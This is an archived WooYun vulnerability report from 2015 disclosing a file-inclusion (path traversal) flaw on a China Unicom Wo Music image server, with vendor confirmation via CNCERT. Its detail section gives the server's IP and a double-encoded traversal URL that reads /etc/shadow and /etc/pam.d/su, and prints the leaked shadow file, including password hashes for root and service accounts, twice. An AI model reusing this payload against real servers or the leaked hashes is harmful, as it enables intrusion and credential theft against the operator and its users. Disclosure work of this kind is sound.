联通沃音乐服务器存在文件包含 | wooyun-2015-0109319| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0109319

漏洞标题：联通沃音乐服务器存在文件包含

漏洞作者：神笔马良

提交时间：2015-04-24 17:09

修复时间：2015-06-12 09:52

公开时间：2015-06-12 09:52

漏洞类型：文件包含

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-24：细节已通知厂商并且等待厂商处理中
2015-04-28：厂商已经确认，细节仅向厂商公开
2015-05-08：细节向核心白帽子及相关领域专家公开
2015-05-18：细节向普通白帽子公开
2015-05-28：细节向实习白帽子公开
2015-06-12：细节向公众公开

简要描述：

漏洞都不是找的，是发现的

详细说明：

在浙江门户网站：http://wo.zj165.com/
点开wo音乐代码

src="http://58.254.132.218/picture/90647000/copyright/singer/2013052701/100/100179.jpg" onerror="this.src='css/default/images/error.png'"></a> <figcaption><h3>一加一</h3><div>歌手:路阳阳+王铮亮</div></figcaption></figure><figure onclick="javascript:location.href='http://imusic.wo.com.cn/Club/portal/down.do?act=down&copyid=91940000007263'"><a class="list-radius"><img alt="千分之一" src="http://58.254.132.218/picture/90201000/copyright/singer/20090510/100/huangguolun00.jpg" onerror="this.src='css/default/images/error.png'"></a> <figcaption><h3>千分之一</h3><div>歌手:黄鸿升</div></figcaption></figure><figure onclick="javascript:location.href='http://imusic.wo.com.cn/Club/portal/down.do?act=down&copyid=90135000001275'"><a class="list-radius"><img alt="小烦恼没什么大不了" src="http://58.254.132.218/picture/91789000/copyright/singer/2013032806/100/660294.jpg" onerror="this.src='css/default/images/error.png'"></a> <figcaption><h3>小烦恼没什么大不了</h3><div>歌手:许嵩</div></figcaption></figure><figure onclick="javascript:location.href='http://imusic.wo.com.cn/Club/portal/down.do?act=down&copyid=90943000000357'"><a class="list-radius"><img alt="爱与妒忌" src="http://58.254.132.218/picture/91789000/copyright/singer/2013032806/100/660072.jpg" onerror="this.src='css/default/images/error.png'"></a> <figcaption><h3>爱与妒忌</h3><div>歌手:阿悄</div></figcaption></figure><div class="more-div-gray" onclick="javascript:location.href='wonderfulapplication.aspx';">更多</div></div></li>

发现58.254.132.218存在文件包含
http://58.254.132.218/picture//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/shadow
管理员设置的奇葩权限

root:$1$I1Vz07FS$s3fPa1Ho10WHCyI5CW8Xd1:16009::::::
bin:*:14749::::::
daemon:*:14749::::::
lp:*:14749::::::
mail:!*:14749::::::
news:!*:14749::::::
uucp:*:14749::::::
games:*:14749::::::
man:*:14749::::::
wwwrun:*:14749::::::
ftp:*:14749::::::
nobody:*:14749::::::
messagebus:*:14749:0::7:::
haldaemon:*:14749:0::7:::
dnsmasq:*:15288:0:99999:7:::
cyrus:*:15288:0:99999:7:::
vscan:*:15288:0:99999:7:::
uuidd:*:15288:0:99999:7:::
quagga:*:15288:0:99999:7:::
postfix:*:15288:0:99999:7:::
oracle:*:15288:0:99999:7:::
ldap:*:15288:0:99999:7:::
mysql:*:15288:0:99999:7:::
named:*:15288:0:99999:7:::
at:*:15288:0:99999:7:::
fetchmail:*:15288:0:99999:7:::
squid:*:15288:0:99999:7:::
ntp:*:15288:0:99999:7:::
mailman:*:15288:0:99999:7:::
polkituser:*:15288:0:99999:7:::
pulse:*:15288:0:99999:7:::
dhcpd:*:15288:0:99999:7:::
suse-ncc:*:15288:0:99999:7:::
gdm:*:15288:0:99999:7:::
ftpsecure:*:15288:0:99999:7:::
zxin10:!$2a$10$HHlRPHj4/VgX7heotfsmDuWJzpmJWs3rTYSI6v/8HOmdbMJ/vIlwm:15590:0:99999:7:::
dcache:!$2a$10$ZJIXk1n4OsHQ0QHUR7WDGO/tZs9xcGHz8miagKzx5AyfTuzNizplG:15590:0:99999:7:::
hacluster:!:15310:0:99999:7:::
patrol:$2a$10$NhuHHCrVdepSyI6q.AOap.9EwQ63F/0F5i2LkW0EL6Qxlo0whmtmi:16045:0:99999:7:::
nagios:!$2a$10$qzkXvn8R6EsuxaMQ9enKsu5q5URsSNI6EtA2h7czn0xvgJfAKfNVm:15792:0:99999:7:::
vsftp:$2a$10$NH/H7cMhKCUfOfvyObyvnue6/qBciS4t0M.2ora8C//c4OpTKOlcK:16507:0:90:7:::
womusic:$2a$10$ipryt5d84wJcTgoCgFLzEePEkiu2DEOfPfOI4dOJ6AxGduCqIpit.:16501:0:90:7:::
quagga:*:15288:0:99999:7:::
postfix:*:15288:0:99999:7:::
oracle:*:15288:0:99999:7:::
ldap:*:15288:0:99999:7:::
mysql:*:15288:0:99999:7:::
named:*:15288:0:99999:7:::
at:*:15288:0:99999:7:::
fetchmail:*:15288:0:99999:7:::
squid:*:15288:0:99999:7:::
ntp:*:15288:0:99999:7:::
mailman:*:15288:0:99999:7:::
polkituser:*:15288:0:99999:7:::
pulse:*:15288:0:99999:7:::
dhcpd:*:15288:0:99999:7:::
suse-ncc:*:15288:0:99999:7:::
gdm:*:15288:0:99999:7:::
ftpsecure:*:15288:0:99999:7:::
zxin10:!$2a$10$HHlRPHj4/VgX7heotfsmDuWJzpmJWs3rTYSI6v/8HOmdbMJ/vIlwm:15590:0:99999:7:::
dcache:!$2a$10$ZJIXk1n4OsHQ0QHUR7WD

随便看一下，管理员对系统加固的怎么样
http://58.254.132.218/picture//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/pam.d/su

#%PAM-1.0
auth     sufficient     pam_rootok.so
auth     include        common-auth
account  include        common-account
password include        common-password
session  include        common-session
session  optional       pam_xauth.so

管理员可要加油哦

漏洞证明：

root:$1$I1Vz07FS$s3fPa1Ho10WHCyI5CW8Xd1:16009::::::
bin:*:14749::::::
daemon:*:14749::::::
lp:*:14749::::::
mail:!*:14749::::::
news:!*:14749::::::
uucp:*:14749::::::
games:*:14749::::::
man:*:14749::::::
wwwrun:*:14749::::::
ftp:*:14749::::::
nobody:*:14749::::::
messagebus:*:14749:0::7:::
haldaemon:*:14749:0::7:::
dnsmasq:*:15288:0:99999:7:::
cyrus:*:15288:0:99999:7:::
vscan:*:15288:0:99999:7:::
uuidd:*:15288:0:99999:7:::
quagga:*:15288:0:99999:7:::
postfix:*:15288:0:99999:7:::
oracle:*:15288:0:99999:7:::
ldap:*:15288:0:99999:7:::
mysql:*:15288:0:99999:7:::
named:*:15288:0:99999:7:::
at:*:15288:0:99999:7:::
fetchmail:*:15288:0:99999:7:::
squid:*:15288:0:99999:7:::
ntp:*:15288:0:99999:7:::
mailman:*:15288:0:99999:7:::
polkituser:*:15288:0:99999:7:::
pulse:*:15288:0:99999:7:::
dhcpd:*:15288:0:99999:7:::
suse-ncc:*:15288:0:99999:7:::
gdm:*:15288:0:99999:7:::
ftpsecure:*:15288:0:99999:7:::
zxin10:!$2a$10$HHlRPHj4/VgX7heotfsmDuWJzpmJWs3rTYSI6v/8HOmdbMJ/vIlwm:15590:0:99999:7:::
dcache:!$2a$10$ZJIXk1n4OsHQ0QHUR7WDGO/tZs9xcGHz8miagKzx5AyfTuzNizplG:15590:0:99999:7:::
hacluster:!:15310:0:99999:7:::
patrol:$2a$10$NhuHHCrVdepSyI6q.AOap.9EwQ63F/0F5i2LkW0EL6Qxlo0whmtmi:16045:0:99999:7:::
nagios:!$2a$10$qzkXvn8R6EsuxaMQ9enKsu5q5URsSNI6EtA2h7czn0xvgJfAKfNVm:15792:0:99999:7:::
vsftp:$2a$10$NH/H7cMhKCUfOfvyObyvnue6/qBciS4t0M.2ora8C//c4OpTKOlcK:16507:0:90:7:::
womusic:$2a$10$ipryt5d84wJcTgoCgFLzEePEkiu2DEOfPfOI4dOJ6AxGduCqIpit.:16501:0:90:7:::
quagga:*:15288:0:99999:7:::
postfix:*:15288:0:99999:7:::
oracle:*:15288:0:99999:7:::
ldap:*:15288:0:99999:7:::
mysql:*:15288:0:99999:7:::
named:*:15288:0:99999:7:::
at:*:15288:0:99999:7:::
fetchmail:*:15288:0:99999:7:::
squid:*:15288:0:99999:7:::
ntp:*:15288:0:99999:7:::
mailman:*:15288:0:99999:7:::
polkituser:*:15288:0:99999:7:::
pulse:*:15288:0:99999:7:::
dhcpd:*:15288:0:99999:7:::
suse-ncc:*:15288:0:99999:7:::
gdm:*:15288:0:99999:7:::
ftpsecure:*:15288:0:99999:7:::
zxin10:!$2a$10$HHlRPHj4/VgX7heotfsmDuWJzpmJWs3rTYSI6v/8HOmdbMJ/vIlwm:15590:0:99999:7:::
dcache:!$2a$10$ZJIXk1n4OsHQ0QHUR7WD

修复方案：

过滤

版权声明：转载请注明来源神笔马良@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-04-28 09:51

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理部门处置.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0109319

漏洞标题：联通沃音乐服务器存在文件包含

相关厂商：中国联通

漏洞作者：神笔马良

提交时间：2015-04-24 17:09

修复时间：2015-06-12 09:52

公开时间：2015-06-12 09:52

漏洞类型：文件包含

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源神笔马良@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0109319

漏洞标题：联通沃音乐服务器存在文件包含

相关厂商：中国联通

漏洞作者： 神笔马良

提交时间：2015-04-24 17:09

修复时间：2015-06-12 09:52

公开时间：2015-06-12 09:52

漏洞类型：文件包含

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0109319"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 神笔马良@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：神笔马良

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源神笔马良@乌云